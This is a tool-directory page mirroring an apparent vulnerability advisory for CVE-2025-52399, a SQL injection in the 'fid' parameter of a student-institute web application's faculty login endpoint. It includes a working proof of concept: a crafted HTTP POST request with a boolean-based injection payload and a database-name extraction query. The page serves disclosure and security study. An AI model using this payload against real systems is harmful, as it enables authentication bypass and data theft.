Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-52399-SQLi-Institute-of-Current-Students | Kitploit
Tools/GitHubGitHub/gmh5225/cve-2025-52399-sqli-institute-of-current-students
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & Education
GitHubgmh5225/cve-2025-52399-sqli-institute-of-current-students

CVE-2025-52399-SQLi-Institute-of-Current-Students

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
1 year agoNot yet reviewed

CVE-2025-52399 - SQL Injection in Institute of Current Students

Summary

The loginlinkfaculty endpoint in the Institute-of-Current-Students application is vulnerable to SQL Injection via the fid POST parameter. The parameter is not properly sanitized before being used in a SQL query, allowing remote attackers to execute arbitrary SQL commands.

  • Vulnerability Type: SQL Injection
  • Affected Component: /loginlinkfaculty (POST)
  • Affected Parameter: fid
  • Authentication: Not required
  • Impact: Authentication bypass, data extraction
  • Tested On: Localhost
  • Database: icsnew
  • Version: 1.0

PoC

HTTP Request

http POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

fid=-1'+OR+321=6+AND+000942=000942--&pass=example

Payload Result

✅ -1' OR 3*2*1=6 AND 000942=000942 -- → TRUE ❌ -1' OR 2*3=4 AND 000942=000942 -- → FALSE

Database Extraction

SELECT database(); -- returns 'icsnew'

References

  • CVE-2025-52399 (MITRE)
  • Vulnerable Application
  • OWASP SQL Injection

Discoverer

Isroil Mustafoqulov

Download Tool